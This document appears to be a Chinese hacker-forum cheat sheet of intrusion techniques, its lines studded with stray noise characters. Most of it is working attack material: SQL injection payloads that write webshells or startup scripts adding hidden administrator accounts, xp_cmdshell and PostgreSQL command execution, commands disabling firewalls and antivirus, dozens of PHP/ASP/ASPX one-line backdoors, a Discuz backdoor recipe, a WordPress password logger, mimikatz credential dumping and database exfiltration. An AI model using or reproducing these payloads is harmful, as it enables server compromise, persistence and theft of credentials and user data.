1 R: j% j. W/ Q) w. A0 b$ V( _7 T( }0 M
中文版本操作系统中针对mysql添加用户完整代码:5 E9 F' K0 l* i0 u

+ Q5 ?  E7 {4 X; z9 {use test;
6 i' G/ `1 Z0 c% H( _create table a (cmd text);5 e8 r) H" V1 d0 c# m
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( i) E9 ]6 h0 s
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
1 t, H0 o: j  e# j, pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; x9 O" b9 ]8 u& e; U8 j# Rselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";* i+ W6 M; Z& |, A9 b
drop table a;
. [( U$ s+ N8 R& l8 K# z+ j% j
" k' B/ V' N5 E! w8 m3 b英文版本:7 D" b& E6 G+ z3 L- ^
& C& D( T: _5 g% _8 h! w1 `# x5 ^$ s- c
use test;  R6 s/ f$ C' K( `
create table a (cmd text);; \. f; ^, a7 t, V) W/ t
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 V3 b4 e8 i; Q$ G& \; E" ninsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );6 ?- Z! ]0 H6 G1 L& H& g6 g3 A8 [
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& S# i1 G1 d% Y) p6 Hselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";5 b2 T; B8 |3 O6 J( @5 C6 Q, O
drop table a;
1 E. K0 V7 _: S) L+ l
/ g) b1 r" ]! D( Z: ?/ D5 _create table a (cmd BLOB);- |5 n) F' I4 I+ |& X
insert into a values (CONVERT(木马的16进制代码,CHAR));
3 b' K- {9 g1 \" L$ H: u. h* Z' [select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'9 i7 K5 V/ F" d# O
drop table a;7 x8 o: U% Z* e
2 p: }: y/ b+ g& Z! l( j! D  [
记录一下怎么处理变态诺顿0 ^4 {1 D7 f9 T* M+ V3 w& E) \
查看诺顿服务的路径
' r5 y8 O3 B5 _. v9 G1 p+ r# f' Lsc qc ccSetMgr
4 W+ O4 ^4 X' O6 s- k然后设置权限拒绝访问。做绝一点。。
$ ^( V/ y& a( w. `2 I/ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system- N1 @2 k" o5 B3 v0 L3 u: D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"5 M8 B0 A* u1 ^& y# X& z. Y& \
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
3 R/ e5 d9 `0 Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
; d7 {0 J1 ], A  m$ c5 Y3 d
( P2 |6 D9 [  o- U0 Y/ Y+ |  w然后再重启服务器
! Q" B: G: D" U% Z/ d: c* liisreset /reboot
) ~& O+ U9 G/ i这样就搞定了。。不过完事后。记得恢复权限。。。。
, W3 s# @/ \' ]/ r. Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F: `8 B' Y* C2 g) d
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
3 n0 H7 J& n1 v% @) B) o% icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F" r8 X5 R* F; G0 r! k: D6 C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
5 p/ S6 \8 X6 r9 [. M% E6 ySELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin% M! q4 l4 o/ s# n" A" o: v9 Z) l

, U3 z/ I  p0 u9 _% H, R: tEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
% p$ }: ?1 I1 }! D: d, k7 v9 v" P" ~6 B
postgresql注射的一些东西0 ^. _1 |! q. y, u" F- n
如何获得webshell% Q; h# p$ q: D, n6 ?% L' w
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 9 `/ E5 ^) ]/ L& V
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
- i9 w0 s3 n. o' P1 ~1 u" z+ @: s5 Nhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
4 E1 X$ o3 T0 Y7 w7 R  d如何读文件. T+ o6 H6 f8 e
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);  ~, }. }9 U( G& x& e
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
! f, V# i# _( F, Y) zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
+ P2 z+ Y9 y8 ~# `! _, [$ h) q6 p3 f) p5 ?3 _) ~# `. N
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
& n3 J4 {4 [$ e# n+ x当然,这些的postgresql的数据库版本必须大于8.X
! ?% f! C1 o9 v/ f  Z' K* L, e" Z创建一个system的函数:) y3 w) X% k: p/ T
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT& C8 j( O' j" @
1 y& g+ W( V. ]- Z3 k5 `8 T5 {/ q
创建一个输出表:
" n# a0 E) O5 Q  p" _+ PCREATE TABLE stdout(id serial, system_out text)! s9 ?3 ]7 \2 ^

& D. e( {  G! Z  d" M; r; E执行shell,输出到输出表内:5 k4 d6 A4 B, f+ w
SELECT system('uname -a > /tmp/test')
. w$ b  [( M! L# E+ G$ |2 U+ q$ B0 G
copy 输出的内容到表里面;  P! F2 a) m! _8 b! P7 ]
COPY stdout(system_out) FROM '/tmp/test'
2 ^! c1 W" J- p0 r5 j& B9 D. h( A' l/ W
从输出表内读取执行后的回显,判断是否执行成功7 Y8 F" H$ _  t# Z6 }
( X4 p  U! L" L( r/ c" j
SELECT system_out FROM stdout0 u$ e- Q# ]# f6 m$ \
下面是测试例子5 \+ E3 d# \; s- f

! D" G$ _; a( @! Y8 W; S  K2 D/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
2 C) C. [" N$ p
$ m" |) U$ S4 @( S3 X% p4 E& x% f! j/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'+ e" u% O: M& z
STRICT --% ?4 Z# z9 c: K, |. N! T3 A' X% Z0 G

# [; q" g( [+ m' [/store.php?id=1; SELECT system('uname -a > /tmp/test') --9 @" |, W  ?% L6 t1 v( S, a3 t, c

  R0 D! I/ H9 r. h4 D3 u$ @  i/ q; M/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/ J# ^' L+ t$ ?0 ?. o* D1 i2 H. Z7 h, r, B* s
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--8 C" D5 _' E: C: b7 r
net stop sharedaccess    stop the default firewall, L" z& s, p8 Q0 X( f: m
netsh firewall show      show/config default firewall
2 }) e1 |2 o" ^) ~: }& gnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall) m$ G  Z8 H+ I) \. q5 S- W7 Y
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall4 i; Q& A2 z: A8 X/ h' m
修改3389端口方法(修改后不易被扫出)- `& u/ w2 m2 F- _" F
修改服务器端的端口设置,注册表有2个地方需要修改
& Q" P: \1 B* f  M5 v8 D
% `) s& f; ^0 H0 @[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
( v' Q$ z$ Z7 _' QPortNumber值,默认是3389,修改成所希望的端口,比如6000. B6 z+ P+ Y4 N2 p4 t+ n) D
- g+ W4 H- E. O
第二个地方:
; ]- {5 C; H1 p% T[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
- `5 |/ o# t: E& c3 {% i( w; R7 X. ^PortNumber值,默认是3389,修改成所希望的端口,比如6000
& W& F7 b' q/ {" u3 B1 G( {' w+ _! c/ L5 c; ~" H
现在这样就可以了。重启系统就可以了! A1 O0 E2 E7 S
3 p; F/ H5 O7 f7 l# |2 A
查看3389远程登录的脚本+ V* U; }$ \. u! p
保存为一个bat文件
* _+ W) Z) _: l' S4 r6 `date /t >>D:\sec\TSlog\ts.log
6 ]' T& R# k; H  x( g8 I. E* \% Htime /t >>D:\sec\TSlog\ts.log
" [! [7 R2 z, r# e- \netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
" O, r" |; D8 l, A: K6 U3 r+ ]7 _start Explorer6 y) h  g2 r+ _$ v* {) O$ S

# h* M6 M+ s/ c  ~7 emstsc的参数:3 `+ ?0 T6 ^! B; |
5 m: p0 G6 R/ P- A) z
远程桌面连接
" V" f* B' p" V% d+ \" k
  U  l7 Q8 X0 n6 l8 mMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]% r+ V$ D/ Z* n! E# s
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
6 g$ ?+ y9 u( ^* K( A/ s- L0 K1 t+ ]! V3 R
<Connection File> -- 指定连接的 .rdp 文件的名称。
6 d3 I6 q7 A  n% e, G0 p; f& C4 ?; M' ?
/v:<server[:port]> -- 指定要连接到的终端服务器。5 a( s# j5 w5 J
% Z! D# t9 @; [& H7 Q. M; m. x
/console -- 连接到服务器的控制台会话。* O# R7 T! L+ J0 N

7 p- a5 h6 K' q5 x$ b' v! ]/f -- 以全屏模式启动客户端。9 r) f1 e( l# o  n! ~5 N

* i7 Q+ F  k8 V, L3 ~9 r1 Y8 D2 |/w:<width> --  指定远程桌面屏幕的宽度。
" ~* G; Z9 `, Q6 z0 T* E0 g0 O! X) z  v* J2 _
/h:<height> -- 指定远程桌面屏幕的高度。
& I' _  D1 v" v# c, c3 S# j9 T& v- Z0 d! M  Q
/edit -- 打开指定的 .rdp 文件来编辑。
7 Q4 q/ G* ]) T5 K2 e. G, E7 D8 G
" B8 i) J, m8 A9 g$ s' j/migrate -- 将客户端连接管理器创建的旧版
" O# @& S8 q# D: Y" p" y  u2 R% h% D4 [  O连接文件迁移到新的 .rdp 连接文件。( `$ Z, }  n- J& m
% B. y& _( B8 B  ]' E( e. m
: K# d) E+ H  A/ t# P$ n9 g
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ o' e8 F( r3 jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量. ~0 k+ a5 f( r3 {4 Q2 P

3 O  b; G4 `6 Y: `命令行下开启3389- g0 i3 R- g0 j. c% \! V$ H- V
net user asp.net aspnet /add
6 T% X1 u. G' g9 b# Knet localgroup Administrators asp.net /add
/ u8 J6 h- l  J1 }0 K8 \net localgroup "Remote Desktop Users" asp.net /add& V) B- ?& r. I+ ^4 l
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
( _# N5 N- f& H" oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
2 ~5 M5 N3 ^4 f6 Vecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1$ y7 t# n$ [5 q3 C5 h. Y/ B
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 C. U, w; T! D+ P& P' ssc config rasman start= auto
3 s  v, y( U5 C" q# V" Wsc config remoteaccess start= auto( P0 p7 |: O1 x
net start rasman
$ _3 s$ d6 I5 b. o+ @, w! Enet start remoteaccess
! O& w! b6 \% l/ ~# z* KMedia, T/ \5 z0 I6 {; V& U* ^
<form id="frmUpload" enctype="multipart/form-data"6 y  J" ^0 W& y. |1 ?) [
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>7 P' t0 n5 J; h* T0 r& x* c: l
<input type="file" name="NewFile" size="50"><br>, o3 h1 J4 g4 x9 t
<input id="btnUpload" type="submit" value="Upload">& U2 a# Q. O) C% }3 y
</form>* s& c' l' x, H# I& }: |  \& n

) X  S) X" B' F6 i$ N$ N- Zcontrol userpasswords2 查看用户的密码
/ Z7 s1 z- b' d$ c9 Laccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
& L' k1 O% D7 t& X( I7 sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ R1 F1 v8 `9 T7 r/ n9 Z4 S' p2 Z& V5 Q( }2 V
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:( P9 F  n5 W5 L5 w% L
测试1:
3 J; i$ X& u2 r; u$ K# ISELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
. ?4 K# ^9 w4 O6 [5 |8 N1 W$ J% P; d! @/ L  }
测试2:, y5 r5 L2 e2 p% k1 g2 [* X

! V2 p3 G2 O' E" g4 X; }create table dirs(paths varchar(100),paths1 varchar(100), id int)7 P7 [# ~6 N, b2 n" \
1 w9 |) k0 _  u0 v+ h
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
% R! b. K, C; R( S& h7 j8 j
. w. I6 }. G; o9 J% R* OSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1" v% u0 W& Y' ?" z+ ~2 [, J5 y; P
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
3 j# f" m4 K6 G0 G- i可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;1 ~( B1 j  l8 p5 g
net stop mcafeeframework
5 a) }& k# P) \' Onet stop mcshield
, |/ v- J0 f/ _9 f2 b; Hnet stop mcafeeengineservice- O0 O; q  j$ w) P! I# N
net stop mctaskmanager1 n) g6 q2 \8 r) k' P% a
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 C) `! S: j. v! g* [, t' b

# p+ g9 G- f' R6 \1 s7 q* A  VNCDump.zip (4.76 KB, 下载次数: 1)
9 |$ l9 M: \7 P( C密码在线破解http://tools88.com/safe/vnc.php
) M+ }% L) O- T4 X0 V& b: SVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
6 W  H* v+ h3 g7 v& T3 X4 S  e# q0 V2 U" J: ^0 e
exec master..xp_cmdshell 'net user'/ ~8 G/ M9 B# ?8 q: F5 p
mssql执行命令。1 k' A4 w: x1 q( t% |  x
获取mssql的密码hash查询2 a1 C" V# T. X! A+ ~
select name,password from master.dbo.sysxlogins! b% k* W3 R+ K4 o- d

% q' @( u5 Z0 ]7 s7 m9 Qbackup log dbName with NO_LOG;
( F, v2 p" s3 {7 |! ~backup log dbName with TRUNCATE_ONLY;
4 @! L& x8 A7 q6 Z8 T- FDBCC SHRINKDATABASE(dbName);: M) q" b. r/ n2 [
mssql数据库压缩
6 H2 e& j5 e$ `4 a, H& S
7 q$ G2 _8 @% U/ J6 TRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
; T& y# b4 U8 d! r$ d* M将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。& `; ]3 g2 c6 T# h$ J: B; }
* B$ |" [3 g. G. Y1 M: ]
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
" q: n8 J4 O# N6 ]' T备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
& B! ^9 Y3 u3 _' D+ Y. {
* R' R5 {* y- i7 X: d" fDiscuz!nt35渗透要点:0 y% U: U0 V5 r! H' x
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default  d1 ]9 g& ^; d" h) y& C5 n' i
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
) X$ u1 d- w& {+ D3 n(3)保存。3 y2 i7 a  f8 R" o, A/ P: O; V5 \
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
0 a$ f" Y+ |' x: M4 A& ?d:\rar.exe a -r d:\1.rar d:\website\
! k- w/ |2 `. f+ {3 q递归压缩website# g1 L2 u* r% B' t$ O+ V# |( ]
注意rar.exe的路径
  f% d( @+ |: g$ q0 Z! N8 F# t# l. L( u5 V: n
<?php
9 `: ^  p. M* y4 \& I. q9 d6 b  {3 _! N: [& o. g% e
$telok   = "0${@eval($_POST[xxoo])}";  I! k3 n4 Z) ]3 L

0 z& H( c9 V; Y$username   = "123456";
0 m: K5 u& S' n' ~
/ g, V( g; Q0 u9 O/ W$userpwd   = "123456";7 U' Q% \# j) k2 i; P7 Q( U

; R% `2 u) d3 x* M: j0 ^$telhao   = "123456";- a- v$ P0 l+ q

2 |, C& `4 Q; Y% F: U$telinfo   = "123456";/ v: A4 t6 U) Y3 X( B8 h, ?6 p

" R* }% ?( h  z( T# A: i?>, |! b/ h  |8 j4 A' ?
php一句话未过滤插入一句话木马
2 C8 D) [; z# D& n4 ?  }8 Q0 q7 D, y/ z2 a
站库分离脱裤技巧( r; o/ z: f$ O5 b
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'% H0 }+ e  M; l, R, c$ o
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
7 ~3 `7 x4 m. x; z5 V: P3 W条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& m' N, _$ k, g7 E8 G
这儿利用的是马儿的专家模式(自己写代码)。
* [8 e8 ^2 l5 d; s/ lini_set('display_errors', 1);
% e0 s) n3 i' W+ s) lset_time_limit(0);+ x0 a+ Y4 e; `+ P" m
error_reporting(E_ALL);
0 i  s! J% J% c, b, ?$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());* ?$ P& R9 |- j  `
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());: V' X% |' H/ G$ C: h& m' U
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 F* A4 V1 K% z& w0 U$ S& ^) I$i = 0;
& \4 k- m0 V% A2 D) P1 s) G$ j5 t$tmp = '';1 Z& k. D1 D+ d/ K$ A4 b
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
) F. G0 X; j/ u# C& a+ \% x    $i = $i+1;
1 I+ g9 X$ n+ D1 Q& `3 R  A    $tmp .=  implode("::", $row)."\n";8 N) f# M7 O) C
    if(!($i%500)){//500条写入一个文件' [. @0 a2 o6 Q, ]: ?# k$ l8 z. ?
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';2 K% B) P6 w8 L6 t- B
        file_put_contents($filename,$tmp);
2 g4 R, I) i: ^( |% G& m- E7 Y! J        $tmp = '';9 w  p4 C, R$ L( b% V% K& D! J, Y
    }
/ k3 j8 J" d8 n6 a6 z}% l* }0 w0 X4 w" Y& m
mysql_free_result($result);
  T  G4 `# {% A- A+ L
, o: @6 H; i1 L- t/ C
' [# Y5 T: I& q+ U7 i- ]
( {/ N4 L( v; D' d, e//down完后delete, M9 L: r, `* b/ w; d# a

, [% w( l5 {9 S% W. I. M( M- H8 h; I6 w5 B7 b
ini_set('display_errors', 1);
' K4 X! A' w2 r+ [error_reporting(E_ALL);
. v7 u4 g& A' W& ?$i = 0;- S, ]6 b4 `8 |' w* ]; r# H# `
while($i<32) {
3 O4 ?  l6 D$ J# h( i    $i = $i+1;
8 B7 R3 N+ a$ o! s/ e! e        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';- N* ~8 I: Q! A2 `$ C
        unlink($filename);8 V! R( d0 {% A, y3 I
}
% e0 a3 ^, _! r& z5 V) `1 \# ]httprint 收集操作系统指纹
) J2 ^6 G) D& Q& W1 ]扫描192.168.1.100的所有端口6 a* }$ ~5 J* U2 V" g
nmap –PN –sT –sV –p0-65535 192.168.1.100: y) J+ [0 I  ^( ]) Y4 u7 d
host -t ns www.owasp.org 识别的名称服务器,获取dns信息1 m) w6 u. Y& y0 G- R9 B& O/ ?; G
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输7 D; l4 p1 J  p8 {( X1 C8 U
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
: j  A/ H$ {0 f
$ W7 c9 E& ]7 f- V- g  y: i4 JDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册), m. r* Y2 w8 _! g% J3 `
. B* @5 W& a  u% [+ p
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% m! S) n' i! r; u$ _' r
0 H+ D- j* F6 z& h/ V
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
, k& C  s) b  F% c
  Y6 v/ Z+ N" B, e  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
* l% c, U* M5 _7 c4 K( P1 z% _, Q2 p6 E7 o5 V: {
  http://net-square.com/msnpawn/index.shtml (要求安装)
& l( r7 a0 o3 X( z2 w0 _
& ?, C+ m5 A3 w/ e- V% R7 }  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)6 t  p5 V( Q; ]) M& T+ T

7 Y' k2 K3 ?7 z. K* {& u  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)5 r3 u5 J4 I# U: p; N+ Y& J
set names gb2312
! v' e( w  U0 t2 |$ ^- ?+ w导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。! @' g* ~. |3 v4 t4 v: q. N2 x
# D3 B, G. Q, E) h2 R
mysql 密码修改# Z/ U/ L# U1 E7 ?# ^' ~
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
- R0 V" K! P' I# E; z/ \update user set password=PASSWORD('antian365.com') where user='root';+ g1 O+ K: h# I5 p
flush privileges;+ f: S% c2 Y' N5 G  d! L
高级的PHP一句话木马后门0 x. _- A) A6 R/ d
2 H, f# a5 B* g' t
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
) L  q* ~- T# t& E4 T2 @
% J, b/ i/ @+ M1、" k: t* m; P6 A; i/ L

6 O- ^7 n( v7 [9 V8 d) B' s3 d  T$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
! Z5 ~1 m) F' B  O: m
+ z8 E# A) B; v2 f- n$hh("/[discuz]/e",$_POST['h'],"Access");4 q4 n% S+ Q, M% |* {

+ E0 g. ]/ Z& V//菜刀一句话1 x, s0 d) ?! b$ e8 h0 N
4 T* v3 @/ N0 e- d# F4 J; s
2、7 L' l6 b; ~+ H( ]6 Z
5 K$ {; X4 j! R4 _9 V8 v' h, I
$filename=$_GET['xbid'];  s" G8 n; w/ a+ v/ V7 l8 ]
$ G) m) e- W0 z% G' y
include ($filename);
! {" \: ^% @9 W
2 m: Y1 v( l* F  h8 }) F* ]//危险的include函数,直接编译任何文件为php格式运行
' F" W. @' R( W2 v+ o8 l- c) C8 J6 x( ]3 h* D0 }% b& `
3、; h8 ?0 I1 F. w! M

6 @* v+ `* x5 C+ P$reg="c"."o"."p"."y";, ]) z; Y- D# }& }6 \# Y
5 X) y7 C% _0 h; ?' H
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);; _0 E' t, S9 \# h

; X/ S' {0 o( S" R% d8 _& Y//重命名任何文件  |, m  }; g; V, N7 T

1 a6 x4 d( q, ^* A1 W2 f  W4、
3 Y1 \( d$ \9 b% i6 j# X9 [; w8 d( _1 y+ a* ], c( B, e- P: E
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 h, n$ J5 r; d; n1 ~/ c1 l
6 H( z5 r3 J. c* v
$gzid("/[discuz]/e",$_POST['h'],"Access");
' I4 p7 S0 v4 n6 A- F- I
% q! t8 q7 l" s5 f//菜刀一句话6 \9 \8 g" \) t# I, P' J6 ^/ G
) S' P8 K) S4 x! @5 ~! ^  m
5、include ($uid);" o1 E0 E( \  \7 M8 M

+ I; @' a9 o3 v/ O& M: m//危险的include函数,直接编译任何文件为php格式运行,POST
' V: x* V2 E; Y) q
( z$ [! r+ Q1 A3 x: `
* L- [* @- D+ E8 y6 }; A' x& A! P//gif插一句话
5 S( i2 U4 I8 N! e9 R, Z3 ?; Z4 S0 W  V( `9 E
6、典型一句话5 x) O2 b( v: t
4 W* ]: P' f9 W2 f& x2 p. x! X
程序后门代码
# V& ?9 y2 [  Z" p  V<?php eval_r($_POST[sb])?>
* |: n- n/ _; X5 x( E: `程序代码
* @: I! }8 G4 I8 [<?php @eval_r($_POST[sb])?>
; \! i) D( X; d# I4 p2 D//容错代码4 E% P0 l1 Q$ h8 o# J1 a/ v% _
程序代码
% b! v$ A1 W7 z& M3 h& N0 d; A' G<?php assert($_POST[sb]);?>0 X  g9 v  [0 L. e7 g
//使用lanker一句话客户端的专家模式执行相关的php语句
  T: C5 m/ a/ g2 y' D. z3 V程序代码
9 @7 ^4 f& ?: M$ U2 _<?$_POST['sa']($_POST['sb']);?>
0 p! h. H! i% r, B. D0 c! i. @程序代码: h3 U* P& r2 ^( ?* X5 X+ K. T6 d# G
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>9 T8 @4 _5 [) K8 B' V4 H2 K% M
程序代码
. S/ k- I2 H- j9 ^% Z1 f' g$ I<?php
& y/ I$ m6 T3 t% i. {6 |5 F5 b@preg_replace("/[email]/e",$_POST['h'],"error");
( ]1 B% |2 S" z$ B6 e?>+ F4 F$ k, C  X' C$ s* R  E" A
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入# H  D8 L1 U; `. N! S' d5 j
程序代码1 \+ H4 g! [1 `+ \' Q1 s
<O>h=@eval_r($_POST[c]);</O>8 Z* p4 k/ C6 s* C+ s: w( Q( E: Z
程序代码
, ^. t. k1 \! t5 T& Q6 U, U<script language="php">@eval_r($_POST[sb])</script>
/ a  Z4 L% B* A0 I/ `4 o- U//绕过<?限制的一句话
2 e3 \  [: R' v
. Q3 ~* t5 E0 E" G- E; lhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip) q3 o! y" |# A5 Q6 W
详细用法:3 }& u. ]/ f# Y
1、到tools目录。psexec \\127.0.0.1 cmd# z$ P8 D7 ^- |# \7 Q
2、执行mimikatz
! `; @5 e, X# w+ U4 X+ ?* L3、执行 privilege::debug) e( D( ^/ ?/ n; ^7 l  T
4、执行 inject::process lsass.exe sekurlsa.dll
- t. Y, L8 s) Q0 i1 }' F+ `2 h5、执行@getLogonPasswords
/ o( A0 W, {3 Q; L8 T6、widget就是密码3 T9 ]4 \) y% u3 H5 s- ?/ q
7、exit退出,不要直接关闭否则系统会崩溃。
* s5 c3 X. B0 [( i
, O# P7 _0 h8 k; w! Dhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
- \2 _- F& ~/ p+ E& ^
7 l1 F1 `; a* Q自动查找系统高危补丁7 D9 N6 W$ Z7 N1 A1 U/ `7 j. R
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
* P& d# m& H0 i$ u7 Y0 _& I
( ~  \/ O! x  x) D4 _8 H! @' t突破安全狗的一句话aspx后门8 Y, V8 l# d; o( D; Q- v  `6 P0 L3 e
<%@ Page Language="C#" ValidateRequest="false" %>" z, L5 ~6 ~) u; o1 q
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>4 D# @# [  H; P1 l( s
webshell下记录WordPress登陆密码
( c* C7 Q8 _) [. y$ Zwebshell下记录Wordpress登陆密码方便进一步社工
7 J( U% G# ^2 S) `. ^5 q在文件wp-login.php中539行处添加:
4 Z6 {, ?( B0 W2 `- T// log password7 j( V: {2 F( P5 L8 {, M
$log_user=$_POST['log'];
2 x- u& m1 Q" O( Y/ ?$log_pwd=$_POST['pwd'];
, F- }8 m; u1 x- q$log_ip=$_SERVER["REMOTE_ADDR"];
2 C7 h9 w; ^2 ], z' ~$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;  s& i( I0 J- h: \
$txt=$txt.”\r\n”;
) H) W0 b1 l% r+ m+ H  x% g  G& T* aif($log_user&&$log_pwd&&$log_ip){
, V( M3 _7 W; |- `( x8 w@fwrite(fopen(‘pwd.txt’,”a+”),$txt);/ l: ?; Z6 e. K: N$ i4 z+ X
}, q4 M! S, I- H+ q
